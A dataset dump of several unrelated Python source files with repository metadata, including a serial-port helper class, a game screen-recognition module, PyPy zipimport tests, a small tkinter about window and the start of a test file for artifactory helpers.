e8e389fcfd8d1aa1b9f1d1b2df530b8b2034fbc2 | 5,222 | py | Python | Serial-Tool/Utils/SerialHelper.py | summDy/Python | 54dc33d042fea010460f2a77f443890b1cbb3069 | [
"Unlicense"
] | null | null | null | Serial-Tool/Utils/SerialHelper.py | summDy/Python | 54dc33d042fea010460f2a77f443890b1cbb3069 | [
"Unlicense"
] | null | null | null | Serial-Tool/Utils/SerialHelper.py | summDy/Python | 54dc33d042fea010460f2a77f443890b1cbb3069 | [
"Unlicense"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import time
import serial
import logging
import binascii
import platform
import threading
if platform.system() == "Windows":
from serial.tools import list_ports
else:
import glob, os, re
class SerialHelper(object):
def __init__(self, Port="COM6", BaudRate="9600", ByteSize="8", Parity="N", Stopbits="1"):
'''
初始化一些参数
'''
self.port = Port
self.baudrate = BaudRate
self.bytesize = ByteSize
self.parity = Parity
self.stopbits = Stopbits
self.threshold_value = 1
self.receive_data = ""
self._serial = None
self._is_connected = False
def connect(self, timeout=2):
'''
连接设备
'''
self._serial = serial.Serial()
self._serial.port = self.port
self._serial.baudrate = self.baudrate
self._serial.bytesize = int(self.bytesize)
self._serial.parity = self.parity
self._serial.stopbits = int(self.stopbits)
self._serial.timeout = timeout
try:
self._serial.open()
if self._serial.isOpen():
self._is_connected = True
except Exception as e:
self._is_connected = False
logging.error(e)
def disconnect(self):
'''
断开连接
'''
if self._serial:
self._serial.close()
def write(self, data, isHex=False):
'''
发送数据给串口设备
'''
if self._is_connected:
if isHex:
data = binascii.unhexlify(data)
self._serial.write(bytes(data))
def on_connected_changed(self, func):
'''
set serial connected status change callback
'''
tConnected = threading.Thread(target=self._on_connected_changed, args=(func, ))
tConnected.setDaemon(True)
tConnected.start()
def _on_connected_changed(self, func):
'''
set serial connected status change callback
'''
self._is_connected_temp = False
while True:
if platform.system() == "Windows":
for com in list_ports.comports():
if com[0] == self.port:
self._is_connected = True
break
elif platform.system() == "Linux":
if self.port in self.find_usb_tty():
self._is_connected = True
if self._is_connected_temp != self._is_connected:
func(self._is_connected)
self._is_connected_temp = self._is_connected
time.sleep(0.8)
def on_data_received(self, func):
'''
set serial data recieved callback
'''
tDataReceived = threading.Thread(target=self._on_data_received, args=(func, ))
tDataReceived.setDaemon(True)
tDataReceived.start()
def _on_data_received(self, func):
'''
set serial data recieved callback
'''
while True:
if self._is_connected:
try:
number = self._serial.inWaiting()
if number > 0:
data = self._serial.read(number)
if data:
func(data)
except Exception as e:
self._is_connected = False
self._serial = None
break
def find_usb_tty(self, vendor_id=None, product_id=None):
'''
查找Linux下的串口设备
'''
tty_devs = list()
for dn in glob.glob('/sys/bus/usb/devices/*') :
try:
vid = int(open(os.path.join(dn, "idVendor" )).read().strip(), 16)
pid = int(open(os.path.join(dn, "idProduct")).read().strip(), 16)
if ((vendor_id is None) or (vid == vendor_id)) and ((product_id is None) or (pid == product_id)) :
dns = glob.glob(os.path.join(dn, os.path.basename(dn) + "*"))
for sdn in dns :
for fn in glob.glob(os.path.join(sdn, "*")) :
if re.search(r"\/ttyUSB[0-9]+$", fn) :
tty_devs.append(os.path.join("/dev", os.path.basename(fn)))
except Exception as ex:
pass
return tty_devs
class testHelper(object):
def __init__(self):
self.myserial = SerialHelper(Port="COM3", BaudRate="115200")
self.myserial.on_connected_changed(self.myserial_on_connected_changed)
def write(self, data):
self.myserial.write(data, True)
def myserial_on_connected_changed(self, is_connected):
if is_connected:
print("Connected")
self.myserial.connect()
self.myserial.on_data_received(self.myserial_on_data_received)
else:
print("DisConnected")
def myserial_on_data_received(self, data):
print(data)
if __name__ == '__main__':
myserial = testHelper()
time.sleep(1)
myserial.write("7EF9010000FA7E")
count = 0
while count < 9:
print("Count: %s"%count)
time.sleep(1)
count += 1
| 30.717647 | 115 | 0.54098 | 566 | 5,222 | 4.789753 | 0.259717 | 0.059019 | 0.082995 | 0.03246 | 0.261527 | 0.1564 | 0.142383 | 0.1173 | 0.089266 | 0.089266 | 0 | 0.012094 | 0.350823 | 5,222 | 169 | 116 | 30.899408 | 0.787611 | 0.046151 | 0 | 0.208333 | 0 | 0 | 0.031852 | 0.00461 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108333 | false | 0.008333 | 0.075 | 0 | 0.208333 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8e957df229ac4b7349bcbeff3fbe7dd1dc79e5b | 8,607 | py | Python | arknights_mower/utils/recognize.py | rebelice/arknights-mower | 1ad7f452179253211596efe27e778a62526c9a96 | [
"MIT"
] | null | null | null | arknights_mower/utils/recognize.py | rebelice/arknights-mower | 1ad7f452179253211596efe27e778a62526c9a96 | [
"MIT"
] | null | null | null | arknights_mower/utils/recognize.py | rebelice/arknights-mower | 1ad7f452179253211596efe27e778a62526c9a96 | [
"MIT"
] | null | null | null | import numpy as np
import cv2
from ..__init__ import __rootdir__
from . import config, detector
from .log import logger, save_screenshot
from .scene import Scene, SceneComment
from .image import bytes2img, loadimg, threshole
from .matcher import Matcher
class RecognizeError(Exception):
pass
class Recognizer():
def __init__(self, adb, debug_screencap=None):
self.adb = adb
self.update(debug_screencap)
def update(self, debug_screencap=None, matcher=True):
while True:
try:
if debug_screencap is not None:
self.screencap = debug_screencap
else:
self.screencap = self.adb.screencap()
self.img = bytes2img(self.screencap)
self.gray = bytes2img(self.screencap, True)
self.h, self.w, _ = self.img.shape
self.matcher = Matcher(self.gray) if matcher else None
self.scene = Scene.UNDEFINED
break
except cv2.error as e:
logger.warning(e)
continue
def color(self, x, y):
return self.img[y][x]
def get_scene(self):
if self.scene != Scene.UNDEFINED:
return self.scene
if self.find('index_nav', thres=250, scope=((0, 0), (100+self.w//4, self.h//10))) is not None:
self.scene = Scene.INDEX
elif self.find('nav_index') is not None:
self.scene = Scene.NAVIGATION_BAR
elif self.find('materiel_ico') is not None:
self.scene = Scene.MATERIEL
elif self.find('read_mail') is not None:
self.scene = Scene.MAIL
elif self.find('loading') is not None:
self.scene = Scene.LOADING
elif self.find('loading2') is not None:
self.scene = Scene.LOADING
elif self.find('loading3') is not None:
self.scene = Scene.LOADING
elif self.find('loading4') is not None:
self.scene = Scene.LOADING
elif self.is_black():
self.scene = Scene.LOADING
elif self.find('ope_plan') is not None:
self.scene = Scene.OPERATOR_BEFORE
elif self.find('ope_select_start') is not None:
self.scene = Scene.OPERATOR_SELECT
elif self.find('ope_agency_going') is not None:
self.scene = Scene.OPERATOR_ONGOING
elif self.find('ope_elimi_finished') is not None:
self.scene = Scene.OPERATOR_ELIMINATE_FINISH
elif self.find('ope_finish') is not None:
self.scene = Scene.OPERATOR_FINISH
elif self.find('ope_recover_potion_on') is not None:
self.scene = Scene.OPERATOR_RECOVER_POTION
elif self.find('ope_recover_originite_on') is not None:
self.scene = Scene.OPERATOR_RECOVER_ORIGINITE
elif self.find('double_confirm') is not None:
self.scene = Scene.DOUBLE_CONFIRM
elif self.find('ope_firstdrop') is not None:
self.scene = Scene.OPERATOR_DROP
elif self.find('ope_eliminate') is not None:
self.scene = Scene.OPERATOR_ELIMINATE
elif self.find('ope_giveup') is not None:
self.scene = Scene.OPERATOR_GIVEUP
elif self.find('friend_list_on') is not None:
self.scene = Scene.FRIEND_LIST_ON
elif self.find('credit_visiting') is not None:
self.scene = Scene.FRIEND_VISITING
elif self.find('infra_overview') is not None:
self.scene = Scene.INFRA_MAIN
elif self.find('infra_todo') is not None:
self.scene = Scene.INFRA_TODOLIST
elif self.find('clue') is not None:
self.scene = Scene.INFRA_CONFIDENTIAL
elif self.find('infra_overview_in') is not None:
self.scene = Scene.INFRA_ARRANGE
elif self.find('hidden_eye', thres=250, scope=((self.w//4*3, self.h//4*3), (self.w, self.h))) is not None:
self.scene = Scene.INFRA_DETAILS
elif self.find('friend_list') is not None:
self.scene = Scene.FRIEND_LIST_OFF
elif self.find("mission_trainee_on") is not None:
self.scene = Scene.MISSION_TRAINEE
elif self.find('mission_daily_on') is not None:
self.scene = Scene.MISSION_DAILY
elif self.find('mission_weekly_on') is not None:
self.scene = Scene.MISSION_WEEKLY
elif self.find('terminal_pre') is not None:
self.scene = Scene.TERMINAL_MAIN
elif self.find('open_recruitment') is not None:
self.scene = Scene.RECRUIT_MAIN
elif self.find('recruiting_instructions') is not None:
self.scene = Scene.RECRUIT_TAGS
elif self.find('agent_token') is not None:
self.scene = Scene.RECRUIT_AGENT
elif self.find('agent_token_1080_1440') is not None:
self.scene = Scene.RECRUIT_AGENT
elif self.find('agent_token_900_1440') is not None:
self.scene = Scene.RECRUIT_AGENT
elif self.find('agent_unlock') is not None:
self.scene = Scene.SHOP_CREDIT
elif self.find('shop_credit_2') is not None:
self.scene = Scene.SHOP_OTHERS
elif self.find('shop_cart') is not None:
self.scene = Scene.SHOP_CREDIT_CONFIRM
elif self.find('login_awake') is not None:
self.scene = Scene.LOGIN_QUICKLY
elif self.find('login_account') is not None:
self.scene = Scene.LOGIN_MAIN
elif self.find('login_loading') is not None:
self.scene = Scene.LOGIN_LOADING
elif self.find('login_iknow') is not None:
self.scene = Scene.LOGIN_ANNOUNCE
elif self.find('12cadpa') is not None:
self.scene = Scene.LOGIN_START
elif detector.announcement_close(self.img) is not None:
self.scene = Scene.ANNOUNCEMENT
elif self.find('skip') is not None:
self.scene = Scene.SKIP
elif self.find('upgrade') is not None:
self.scene = Scene.UPGRADE
elif detector.confirm(self.img) is not None:
self.scene = Scene.CONFIRM
elif self.find('login_captcha') is not None:
self.scene = Scene.LOGIN_INPUT
elif self.find('main_theme') is not None:
self.scene = Scene.TERMINAL_MAIN_THEME
elif self.find('episode') is not None:
self.scene = Scene.TERMINAL_EPISODE
elif self.find('biography') is not None:
self.scene = Scene.TERMINAL_BIOGRAPHY
elif self.find('collection') is not None:
self.scene = Scene.TERMINAL_COLLECTION
elif self.find('loading6') is not None:
self.scene = Scene.LOADING
else:
self.scene = Scene.UNKNOWN
# save screencap to analyse
if config.SCREENSHOT_PATH is not None:
save_screenshot(
self.screencap, subdir=f'{self.scene}/{self.h}x{self.w}')
logger.info(f'Scene: {self.scene}: {SceneComment[self.scene]}')
return self.scene
def is_black(self):
return np.max(self.gray[:, 105:-105]) < 16
def find(self, item, draw=False, scope=None, thres=None, judge=True):
logger.debug(f'find {item}')
if thres is not None:
image = threshole(
loadimg(f'{__rootdir__}/resources/{item}.png'), thres)
matcher = Matcher(
threshole(self.gray[scope[0][1]:scope[1][1], scope[0][0]:scope[1][0]], thres))
ret = matcher.match(image, draw=draw, judge=judge)
else:
image = loadimg(f'{__rootdir__}/resources/{item}.png')
matcher = self.matcher
ret = matcher.match(image, draw=draw, scope=scope, judge=judge)
if ret is None:
return None
return ret
def score(self, item, draw=False, scope=None, thres=None):
logger.debug(f'score {item}')
if thres is not None:
image = threshole(
loadimg(f'{__rootdir__}/resources/{item}.png'), thres)
matcher = Matcher(
threshole(self.gray[scope[0][1]:scope[1][1], scope[0][0]:scope[1][0]], thres))
ret = matcher.score(image, draw=draw)
else:
image = loadimg(f'{__rootdir__}/resources/{item}.png')
matcher = self.matcher
ret = matcher.score(image, draw=draw, scope=scope)
if ret is None:
return None
return ret[1:]
def nav_button(self):
return self.find('nav_button', thres=128, scope=((0, 0), (100+self.w//4, self.h//10)))
| 42.820896 | 114 | 0.601255 | 1,124 | 8,607 | 4.47153 | 0.161032 | 0.112813 | 0.10386 | 0.14226 | 0.54238 | 0.491643 | 0.445285 | 0.289694 | 0.176681 | 0.153203 | 0 | 0.013322 | 0.293598 | 8,607 | 200 | 115 | 43.035 | 0.813322 | 0.002905 | 0 | 0.177419 | 0 | 0 | 0.103147 | 0.032751 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043011 | false | 0.005376 | 0.043011 | 0.016129 | 0.145161 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8e95b2f0fc3fa299ec545b3a5144e1b174998b5 | 14,085 | py | Python | pypy/module/zipimport/test/test_zipimport.py | Qointum/pypy | c0ed88efbc135a75a535f4534ca1f3baf0bf39d8 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | pypy/module/zipimport/test/test_zipimport.py | Qointum/pypy | c0ed88efbc135a75a535f4534ca1f3baf0bf39d8 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | pypy/module/zipimport/test/test_zipimport.py | Qointum/pypy | c0ed88efbc135a75a535f4534ca1f3baf0bf39d8 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | import inspect
import os
import time
from zipfile import ZIP_STORED
from pypy.module.imp.test.support import BaseImportTest
from rpython.tool.udir import udir
class AppTestZipimport(BaseImportTest):
""" A bit structurized tests stolen and adapted from
cpy's regression tests
"""
compression = ZIP_STORED
spaceconfig = {
"usemodules": ['zipimport', 'time', 'struct', 'binascii', 'marshal'],
}
pathsep = os.path.sep
@classmethod
def make_class(cls):
BaseImportTest.setup_class.im_func(cls)
space = cls.space
w = space.wrap
cls.w_appdirect = w(cls.runappdirect)
cls.w_now = w(time.time())
cls.w_compression = w(cls.compression)
cls.w_pathsep = w(cls.pathsep)
cls.tmpdir = udir.ensure('zipimport_%s_%s' % (__name__, cls.__name__),
dir=1)
ziptestmodule = cls.tmpdir.join("somezip.zip")
cls.w_tmpzip = w(str(ziptestmodule))
# Cache get_pyc()
get_pyc_source = inspect.getsource(
cls.w__get_pyc.im_func).splitlines()[1:]
get_pyc_source.insert(0, ' (mtime):')
cls.w__test_pyc = space.appexec([cls.w_now], '\n'.join(get_pyc_source))
def setup_class(cls):
cls.make_class()
def setup_method(self, meth):
space = self.space
name = "test_%s_%s.zip" % (self.__class__.__name__, meth.__name__)
self.w_zipfile = space.wrap(str(self.tmpdir.join(name)))
self.w_write_files = space.newlist([])
w_cache = space.getattr(space.getbuiltinmodule('zipimport'),
space.wrap('_zip_directory_cache'))
space.call_function(space.getattr(w_cache, space.wrap('clear')))
self.w_modules = space.call_function(
space.w_list,
space.getattr(space.getbuiltinmodule('sys'),
space.wrap('modules')))
def teardown_method(self, meth):
space = self.space
space.appexec([], """():
import sys
while sys.path[0].endswith('.zip'):
sys.path.pop(0)
""")
space.appexec([self.w_modules], """(modules):
import sys
for module in sys.modules.copy():
if module not in modules:
del sys.modules[module]
""")
self.w_modules = []
def w_get_pyc(self):
# always create the pyc on the host under appdirect, otherwise
# the pre-made copy is fine
return self._get_pyc(self.now) if self.appdirect else self._test_pyc
def w__get_pyc(self, mtime):
import imp
import marshal
if type(mtime) is float:
# Mac mtimes need a bit of special casing
if mtime < 0x7fffffff:
mtime = int(mtime)
else:
mtime = int(-0x100000000 + int(mtime))
mtimeb = int(mtime).to_bytes(4, 'little', signed=True)
source = """\
def get_name():
return __name__
def get_file():
return __file__"""
data = marshal.dumps(compile(source, 'uuu.py', 'exec'))
return imp.get_magic() + mtimeb + data
def w_now_in_the_future(self, delta):
self.now += delta
def w_writefile(self, filename, data):
import sys
import time
from zipfile import ZipFile, ZipInfo
z = ZipFile(self.zipfile, 'w')
write_files = self.write_files
filename = filename.replace('/', self.pathsep)
write_files.append((filename, data))
for filename, data in write_files:
zinfo = ZipInfo(filename, time.localtime(self.now))
zinfo.compress_type = self.compression
z.writestr(zinfo, data)
self.write_files = write_files
# XXX populates sys.path, but at applevel
if sys.path[0] != self.zipfile:
sys.path.insert(0, self.zipfile)
z.close()
def test_cache(self):
self.writefile('x.py', 'y')
from zipimport import _zip_directory_cache, zipimporter
new_importer = zipimporter(self.zipfile)
try:
assert zipimporter(self.zipfile) is not new_importer
finally:
del _zip_directory_cache[self.zipfile]
def test_cache_subdir(self):
import os
self.writefile('x.py', '')
self.writefile('sub/__init__.py', '')
self.writefile('sub/yy.py', '')
from zipimport import _zip_directory_cache, zipimporter
sub_importer = zipimporter(self.zipfile + os.path.sep + 'sub')
main_importer = zipimporter(self.zipfile)
assert main_importer is not sub_importer
assert main_importer.prefix == ""
assert sub_importer.prefix == "sub" + os.path.sep
def test_good_bad_arguments(self):
from zipimport import zipimporter
import os
self.writefile("x.py", "y")
zipimporter(self.zipfile) # should work
raises(ImportError, "zipimporter(os.path.dirname(self.zipfile))")
raises(ImportError, 'zipimporter("fsafdetrssffdsagadfsafdssadasa")')
name = os.path.join(os.path.dirname(self.zipfile), "x.zip")
f = open(name, "w")
f.write("zzz")
f.close()
raises(ImportError, 'zipimporter(name)')
# this should work as well :-/
zipimporter(os.path.join(self.zipfile, 'x'))
def test_py(self):
import sys, os
self.writefile("uuu.py", "def f(x): return x")
mod = __import__('uuu', globals(), locals(), [])
assert mod.f(3) == 3
expected = {
'__doc__' : None,
'__name__' : 'uuu',
'f': mod.f}
for key, val in expected.items():
assert mod.__dict__[key] == val
assert mod.__file__.endswith('.zip'+os.sep+'uuu.py')
def test_pyc(self):
import sys, os
self.writefile("uuu.pyc", self.get_pyc())
self.writefile("uuu.py", "def f(x): return x")
mod = __import__('uuu', globals(), locals(), [])
expected = {
'__doc__' : None,
'__name__' : 'uuu',
'get_name' : mod.get_name,
'get_file' : mod.get_file
}
for key, val in expected.items():
assert mod.__dict__[key] == val
assert mod.__file__.endswith('.zip'+os.sep+'uuu.pyc')
assert mod.get_file() == mod.__file__
assert mod.get_name() == mod.__name__
#
import zipimport
z = zipimport.zipimporter(self.zipfile)
code = z.get_code('uuu')
assert isinstance(code, type((lambda:0).__code__))
def test_bad_pyc(self):
import zipimport
import sys
m0 = self.get_pyc()[0]
m0 ^= 0x04
test_pyc = bytes([m0]) + self.get_pyc()[1:]
self.writefile("uu.pyc", test_pyc)
raises(zipimport.ZipImportError,
"__import__('uu', globals(), locals(), [])")
assert 'uu' not in sys.modules
def test_force_py(self):
import sys
m0 = self.get_pyc()[0]
m0 ^= 0x04
test_pyc = bytes([m0]) + self.get_pyc()[1:]
self.writefile("uu.pyc", test_pyc)
self.writefile("uu.py", "def f(x): return x")
mod = __import__("uu", globals(), locals(), [])
assert mod.f(3) == 3
def test_sys_modules(self):
m0 = self.get_pyc()[0]
m0 ^= 0x04
test_pyc = bytes([m0]) + self.get_pyc()[1:]
self.writefile("uuu.pyc", test_pyc)
import sys
import zipimport
z = zipimport.zipimporter(self.zipfile)
sys.modules['uuu'] = lambda x : x + 1
raises(ImportError, z.load_module, 'uuu')
raises(zipimport.ZipImportError, z.get_code, 'uuu')
def test_package(self):
import os, sys
self.writefile("xxuuu/__init__.py", "")
self.writefile("xxuuu/yy.py", "def f(x): return x")
mod = __import__("xxuuu", globals(), locals(), ['yy'])
assert mod.__path__ == [self.zipfile + os.path.sep + "xxuuu"]
assert mod.__file__ == (self.zipfile + os.path.sep
+ "xxuuu" + os.path.sep
+ "__init__.py")
assert mod.yy.f(3) == 3
def test_package_bug(self):
import os, sys
import types
mod = types.ModuleType('xxuuv')
mod.__path__ = [self.zipfile + '/xxuuv']
sys.modules['xxuuv'] = mod
#
self.writefile("xxuuv/__init__.py", "")
self.writefile("xxuuv/yy.py", "def f(x): return x")
mod = __import__("xxuuv.yy", globals(), locals(), ['__doc__'])
assert mod.__file__ == (self.zipfile + os.path.sep
+ "xxuuv" + os.path.sep
+ "yy.py")
assert mod.f(3) == 3
def test_pyc_in_package(self):
import os, sys
import types
mod = types.ModuleType('xxuuw')
mod.__path__ = [self.zipfile + '/xxuuw']
sys.modules['xxuuw'] = mod
#
self.writefile("xxuuw/__init__.py", "")
self.writefile("xxuuw/zz.pyc", self.get_pyc())
mod = __import__("xxuuw.zz", globals(), locals(), ['__doc__'])
assert mod.__file__ == (self.zipfile + os.path.sep
+ "xxuuw" + os.path.sep
+ "zz.pyc")
assert mod.get_file() == mod.__file__
assert mod.get_name() == mod.__name__
def test_functions(self):
import os
import zipimport
data = b"saddsadsa"
pyc_data = self.get_pyc()
self.now_in_the_future(+5) # write the zipfile 5 secs after the .pyc
self.writefile("xxx", data)
self.writefile("xx/__init__.py", "5")
self.writefile("yy.py", "3")
self.writefile('uu.pyc', pyc_data)
z = zipimport.zipimporter(self.zipfile)
assert z.get_data(self.zipfile + os.sep + "xxx") == data
assert z.is_package("xx")
assert not z.is_package("yy")
assert z.get_source("yy") == '3'
assert z.get_source('uu') is None
raises(ImportError, "z.get_source('zz')")
#assert z.get_code('yy') == py.code.Source('3').compile()
#assert z.get_code('uu') == self.co
assert z.get_code('uu')
assert z.get_code('xx')
assert z.get_source('xx') == "5"
assert z.archive == self.zipfile
mod = z.load_module('xx')
assert z.get_filename('xx') == mod.__file__
def test_archive(self):
"""
The archive attribute of zipimport.zipimporter gives the path to the
zipfile itself.
"""
import os
import zipimport
self.writefile("directory/package/__init__.py", "")
importer = zipimport.zipimporter(self.zipfile + "/directory")
# Grab this so if the assertion fails, py.test will display its
# value. Not sure why it doesn't the assertion uses import.archive
# directly. -exarkun
archive = importer.archive
realprefix = importer.prefix
allbutlast = self.zipfile.split(os.path.sep)[:-1]
prefix = 'directory' + os.path.sep
assert archive == self.zipfile
assert realprefix == prefix
def test_subdirectory_importer(self):
import os
import zipimport
self.writefile("directory/package/__init__.py", "")
z = zipimport.zipimporter(self.zipfile + "/directory")
mod = z.load_module("package")
assert z.is_package("package")
assert z.get_filename("package") == mod.__file__
def test_subdirectory_twice(self):
#import os, zipimport
self.writefile("package/__init__.py", "")
self.writefile("package/subpackage/__init__.py", "")
self.writefile("package/subpackage/foo.py", "")
mod = __import__('package.subpackage.foo', None, None, [])
assert mod
def test_zip_directory_cache(self):
""" Check full dictionary interface
"""
import os
import zipimport
if self.appdirect:
# py3k's appdirect startup may populate _zip_directory_cache
zipimport._zip_directory_cache.clear()
self.writefile("directory/package/__init__.py", "")
importer = zipimport.zipimporter(self.zipfile + "/directory")
l = [i for i in zipimport._zip_directory_cache]
assert len(l) == 1
k = list(zipimport._zip_directory_cache[l[0]].keys())
assert k[0] == os.path.sep.join(['directory','package','__init__.py'])
def test_path_hooks(self):
import sys
import zipimport
assert sys.path_hooks.count(zipimport.zipimporter) == 1
def test_co_filename(self):
self.writefile('mymodule.py', """
def get_co_filename():
return get_co_filename.__code__.co_filename
""")
import os
expected = self.zipfile + os.sep + 'mymodule.py'
#
import mymodule
co_filename = mymodule.get_co_filename()
assert co_filename == expected
#
import zipimport
z = zipimport.zipimporter(self.zipfile)
code = z.get_code('mymodule')
co_filename = code.co_filename
assert co_filename == expected
def test_unencodable(self):
if not self.testfn_unencodable:
skip("need an unencodable filename")
import os
import time
import zipimport
from zipfile import ZipFile, ZipInfo
filename = self.testfn_unencodable + ".zip"
z = ZipFile(filename, "w")
zinfo = ZipInfo("uu.py", time.localtime(self.now))
zinfo.compress_type = self.compression
z.writestr(zinfo, '')
z.close()
try:
zipimport.zipimporter(filename)
finally:
os.remove(filename)
def test_import_exception(self):
self.writefile('x1test.py', '1/0')
self.writefile('x1test/__init__.py', 'raise ValueError')
raises(ValueError, __import__, 'x1test', None, None, [])
if os.sep != '/':
class AppTestNativePathSep(AppTestZipimport):
pathsep = os.sep
| 35.748731 | 79 | 0.581328 | 1,683 | 14,085 | 4.619727 | 0.16221 | 0.051833 | 0.015048 | 0.02791 | 0.310868 | 0.242315 | 0.207074 | 0.17492 | 0.167717 | 0.149968 | 0 | 0.007202 | 0.290238 | 14,085 | 393 | 80 | 35.839695 | 0.770531 | 0.055236 | 0 | 0.303681 | 0 | 0 | 0.125501 | 0.023876 | 0 | 0 | 0.002493 | 0 | 0.128834 | 1 | 0.08589 | false | 0 | 0.291411 | 0.003067 | 0.411043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8eb43bfa86fde6c237561d422bad05792d0797c | 1,371 | py | Python | scripts/about.py | btirumala1219/Py-Node | e21f1fa9ea6f46291da2414a7669e415bdfdda36 | [
"MIT"
] | 1 | 2018-04-03T15:37:30.000Z | 2018-04-03T15:37:30.000Z | scripts/about.py | btirumala1219/Py-Node | e21f1fa9ea6f46291da2414a7669e415bdfdda36 | [
"MIT"
] | null | null | null | scripts/about.py | btirumala1219/Py-Node | e21f1fa9ea6f46291da2414a7669e415bdfdda36 | [
"MIT"
] | null | null | null | import tkinter
import os
#fpath = os.path.join(direct, "about.txt")
file = open("../docs/about.txt", "r")
#print(file.read())
name = file.readline()
#print(name)
data = file.readline()
#print(data)
file.close()
class testabout(tkinter.Tk):
def __init__(self,parent):
tkinter.Tk.__init__(self,parent)
self.parent = parent
self.minsize(width=500, height=400)
self.resizable(False,False)
self.geometry(self.geometry())
self.initialize()
def initialize(self):
self.grid()
var = tkinter.StringVar()
label = tkinter.Label(self, textvariable = var)
var.set(name)
label.grid(column=0,row=0)
var1 = tkinter.StringVar()
labell = tkinter.Label(self, textvariable = var1)
var1.set(data)
labell.grid(column=0,row=1)
# QUIT BUTTON FRAME
containerquit = tkinter.Frame(self, borderwidth=1, relief="sunken", width=125, height=75)
containerquit.place(x=250, y=200)
containerquit.grid_propagate(False)
containerquit.grid_columnconfigure(0,weight=1)
# QUIT BUTTON
quitButton = tkinter.Button(containerquit, text="Quit",command=self.quit, height=3)
quitButton.grid(row=0, column=0, sticky="EW")
if __name__ == "__main__":
app = testabout(None)
app.title('V1_APP')
app.mainloop()
| 27.42 | 97 | 0.634573 | 169 | 1,371 | 5.035503 | 0.455621 | 0.035253 | 0.039953 | 0.065805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029163 | 0.224654 | 1,371 | 49 | 98 | 27.979592 | 0.771402 | 0.080963 | 0 | 0 | 0 | 0 | 0.035088 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.058824 | 0 | 0.147059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8f04b85bf455ecd408ba5d0f8a2993fd5780768 | 10,989 | py | Python | tests/test_artifactory_helpers.py | jhunkeler/ci_watson | b3fe2de27dca9ca567db6a43e264cc6110ec2c7b | [
"BSD-3-Clause"
] | 1 | 2018-08-07T21:04:00.000Z | 2018-08-07T21:04:00.000Z | tests/test_artifactory_helpers.py | jhunkeler/ci_watson | b3fe2de27dca9ca567db6a43e264cc6110ec2c7b | [
"BSD-3-Clause"
] | 46 | 2018-08-07T21:02:15.000Z | 2022-03-09T14:29:15.000Z | tests/test_artifactory_helpers.py | jhunkeler/ci_watson | b3fe2de27dca9ca567db6a43e264cc6110ec2c7b | [
"BSD-3-Clause"
] | 8 | 2018-08-07T21:03:49.000Z | 2022-03-03T17:48:38.000Z | """
Tests requiring internet connection are treated as if they are big data tests.
We could use pytest-remotedata plugin but requiring another plugin to test
a plugin package is a little too meta.
"""
import json
import os
import pytest
from ci_watson.artifactory_helpers import (
HAS_ASTROPY, BigdataError, get_bigdata_root, get_bigdata,
check_url, compare_outputs, generate_upload_params, generate_upload_schema)
@pytest.mark.bigdata
@pytest.mark.parametrize(
('val', 'ans'),
[('/local/path', False),
('https://google.com', True),
('https://github.com/spacetelescopehstcalblahblah', False)])
def test_check_url(val, ans):
assert check_url(val) is ans
class TestBigdataRoot:
def setup_class(self):
self.key = 'FOOFOO'
def teardown_class(self):
if self.key in os.environ:
del os.environ[self.key]
def test_no_env(self):
if self.key in os.environ:
del os.environ[self.key]
with pytest.raises(BigdataError):
get_bigdata_root(envkey=self.key)
@pytest.mark.bigdata
def test_has_env_url(self):
path = 'https://google.com'
os.environ[self.key] = path
assert get_bigdata_root(envkey=self.key) == path
def test_has_env_local(self):
path = os.path.abspath(os.curdir)
os.environ[self.key] = path
assert get_bigdata_root(envkey=self.key) == path
def test_no_path(self):
os.environ[self.key] = '/some/fake/path'
assert get_bigdata_root(envkey=self.key) is None
@pytest.mark.bigdata
class TestGetBigdata:
def setup_class(self):
self.root = get_bigdata_root()
def test_nocopy(self, _jail, pytestconfig):
args = (pytestconfig.getini('inputs_root')[0],
'dev',
'input',
'j6lq01010_asn.fits')
dest = get_bigdata(*args, docopy=False)
assert dest == os.path.abspath(os.path.join(self.root, *args))
assert len(os.listdir()) == 0
@pytest.mark.parametrize('docopy', [True, False])
def test_no_data(self, docopy):
with pytest.raises(BigdataError):
get_bigdata('fake', 'path', 'somefile.txt', docopy=docopy)
def test_get_data(self, _jail, pytestconfig):
"""
This tests download when TEST_BIGDATA is pointing to Artifactory.
And tests copy when it is pointing to local path.
"""
args = (pytestconfig.getini('inputs_root')[0],
'dev',
'input',
'j6lq01010_asn.fits')
dest = get_bigdata(*args)
assert dest == os.path.abspath(os.path.join(os.curdir, args[-1]))
@pytest.mark.bigdata
@pytest.mark.usefixtures('_jail')
@pytest.mark.skipif(not HAS_ASTROPY, reason='requires astropy to run')
class TestCompareOutputs:
"""
Test a few common comparison scenarios.
FITSDiff and HDUDiff are tested in Astropy, so here we simply
test if they report differences or not, but we do not check
the content too closely.
